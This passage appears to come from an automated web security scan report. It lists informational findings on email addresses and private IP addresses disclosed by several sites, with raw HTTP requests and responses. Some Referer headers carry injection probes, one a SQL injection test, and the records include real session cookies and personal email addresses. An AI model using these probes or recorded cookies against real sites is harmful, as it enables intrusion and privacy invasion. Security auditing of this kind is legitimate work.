Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...
23.63. http://www.soundingsonline.com/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /s_code.js HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=n2ng3g2453hjfkm1mhm60hmid3

Response

HTTP/1.1 200 OK
Content-Length: 34160
Content-Type: application/x-javascript
Last-Modified: Tue, 25 Jan 2011 16:00:37 GMT
Accept-Ranges: bytes
ETag: "1c1772a9bccb1:341b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 19:13:21 GMT
Connection: close

/*
SiteCatalyst: H.21.1.
kevin.rogers@dominionenterprises.com
01.25.2011
*/

function switchSuite() {
   var suiteList= "";
       if (location.hostname.indexOf('mobile')!=-1) {
           suiteList += "desoundings,desoundingsmobile";
       } else {    
           suiteList += "deso
...[SNIP]...
23.64. https://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /text/cm/cmtaggingservices_TTA_bottom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /text/cm/cmtaggingservices_TTA_bottom.js HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C241
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:17 GMT
Server: Apache
Last-Modified: Wed, 09 Jun 2010 00:16:11 GMT
ETag: "d80242-d8cc-d029a8c0"
Accept-Ranges: bytes
Content-Length: 55500
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/************************************************************************************/
/* $Revision: $
* $Id: $
*
* Author: Coremetrics/PSD
* Coremetrics v4.2, 2010/01/15
* COPYRIGHT 1999
...[SNIP]...
(temp)==true)
       {
           temp=temp.value+G_PS_SEP+temp.value;
       }
       else
       {
           temp=psGetValueFromCookie(G_PS_CK_ALL, G_PS_COOKIE_PROFILE);
           if(psCheckElementExist(temp)==false)
           {
               temp="testaccount@yahoo.com"+G_PS_SEP+"testaccount@yahoo.com";
           }
           else
           {
               var arrTemp=temp.split(G_PS_SEP);
               temp=arrTemp[0]+G_PS_SEP+arrTemp[0];
           }
       }
   }
   temp=temp+G_PS_SEP+city+G_PS_SEP+state+G_PS_SEP+zip+G_PS_SEP+country;
   psSetVa
...[SNIP]...
23.65. https://www2.hbc.com/contactus/contact-us.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.hbc.com
Path:   /contactus/contact-us.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contactus/contact-us.asp?langid=en&src=hbc HTTP/1.1
Host: www2.hbc.com
Connection: keep-alive
Referer: http://www2.hbc.com/en/index.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10777
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQXCCBAB=MBAOOEFBFOMHLNPDLIHMOMKO; secure; path=/
X-Powered-By: ASP.NET
Date: Wed, 30 Mar 2011 13:51:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<li>Email: HomeOutfitters.CustomerService@hbc.com</li>
...[SNIP]...
me.value==""?"Please enter your name for this inquiry.\n":"");
       msg+=(!/^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/.test(f.iEmail.value)?"Please enter a valid email address for this inquiry (e.g. username@domain.com).\n":"");
       //msg+=(f.iProduct.value==""?"Product/order is required;\n":"");
       msg+=(f.iComment.value==""?"Please enter a comment or question regarding the nature of your inquiry.\n":"");
   
       if (
...[SNIP]...
24. Private IP addresses disclosed  previous  next
There are 240 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

24.1. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "1d8a3f3bf608987ba430a46804c8301f"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "8b1cd4ff7ffc9f02003a34690bac58d7"
X-FB-Server: 10.27.70.127
X-Cnection: close
Content-Length: 111691
Cache-Control: public, max-age=853
Expires: Sat, 26 Mar 2011 20:50:17 GMT
Date: Sat, 26 Mar 2011 20:36:04 GMT
Connection: close
Vary: Accept-Encoding

/*1301094737,169559679,JIT Construction: v358279,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...
24.2. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/app_v_feat.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/app_v_feat.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:45:48 GMT
Content-Length: 10482
Date: Sat, 26 Mar 2011 01:42:27 GMT
X-Varnish: 1939096607 1939073914
Age: 74
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
24.3. http://microsoftcambridge.com/Portals/0/events/AgileGames2011_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/AgileGames2011_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/AgileGames2011_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 01 Feb 2011 16:47:13 GMT
Content-Length: 4893
Date: Sat, 26 Mar 2011 01:42:35 GMT
X-Varnish: 1939099298
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yi...u~.UUWwu..L.L.l....F. .$$.B..N......`.@.c.c.Mq.c.. 9.. '6.BB0'A...FhAb4...Hb..>=..{wu./..{Z3...o|.N.....W.{...~.5n
...[SNIP]...
24.4. http://microsoftcambridge.com/Portals/0/events/CleantechNortheast_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/CleantechNortheast_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/CleantechNortheast_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 23 Mar 2011 20:53:46 GMT
Content-Length: 6479
Date: Sat, 26 Mar 2011 01:42:34 GMT
X-Varnish: 1939098951
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.5. http://microsoftcambridge.com/Portals/0/events/FUserGroup_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/FUserGroup_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/FUserGroup_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 01 Feb 2011 16:59:34 GMT
Content-Length: 2573
Date: Sat, 26 Mar 2011 01:42:34 GMT
X-Varnish: 1939098948
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<..    .IDATx..Xyl....ofvf....^..|..(..M......        .!HE..K.R......m"%R....Fj I....4
...b+A.N8.6`.mlc.o.z.k......kc@
U.P..vg.;......TUUI=
...[SNIP]...
24.6. http://microsoftcambridge.com/Portals/0/events/HPC&GPU_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/HPC&GPU_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/HPC&GPU_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 23 Mar 2011 20:53:46 GMT
Content-Length: 5448
Date: Sat, 26 Mar 2011 01:42:34 GMT
X-Varnish: 1939098960
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.7. http://microsoftcambridge.com/Portals/0/events/LevelUpYourUserExperience_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/LevelUpYourUserExperience_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/LevelUpYourUserExperience_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 15 Mar 2011 21:28:26 GMT
Content-Length: 5134
Date: Sat, 26 Mar 2011 01:42:32 GMT
X-Varnish: 1939098096
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.8. http://microsoftcambridge.com/Portals/0/events/NERD-MITX_img.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/NERD-MITX_img.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/NERD-MITX_img.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 02 Mar 2011 14:42:54 GMT
Content-Length: 13589
Date: Sat, 26 Mar 2011 01:40:26 GMT
X-Varnish: 1939059248
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T...Z......o_'....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.9. http://microsoftcambridge.com/Portals/0/events/NERD-MITX_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/NERD-MITX_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/NERD-MITX_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 02 Mar 2011 14:29:48 GMT
Content-Length: 2474
Date: Sat, 26 Mar 2011 01:42:33 GMT
X-Varnish: 1939098490
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.10. http://microsoftcambridge.com/Portals/0/events/NERDwomensHistory_img.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/NERDwomensHistory_img.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/NERDwomensHistory_img.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 02 Mar 2011 14:42:54 GMT
Content-Length: 8153
Date: Sat, 26 Mar 2011 01:42:31 GMT
X-Varnish: 1939097624
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T...Z......o_'....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.11. http://microsoftcambridge.com/Portals/0/events/NERDwomensHistory_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/NERDwomensHistory_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/NERDwomensHistory_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 02 Mar 2011 14:29:42 GMT
Content-Length: 1938
Date: Sat, 26 Mar 2011 01:42:32 GMT
X-Varnish: 1939098027
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.12. http://microsoftcambridge.com/Portals/0/events/NESAE_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/NESAE_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/NESAE_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 02 Mar 2011 14:29:43 GMT
Content-Length: 3730
Date: Sat, 26 Mar 2011 01:42:32 GMT
X-Varnish: 1939098025
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.13. http://microsoftcambridge.com/Portals/0/events/ProductCampBoston_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/ProductCampBoston_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/ProductCampBoston_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 23 Mar 2011 20:53:48 GMT
Content-Length: 5329
Date: Sat, 26 Mar 2011 01:42:33 GMT
X-Varnish: 1939098605
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.14. http://microsoftcambridge.com/Portals/0/events/aca_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/aca_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/aca_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
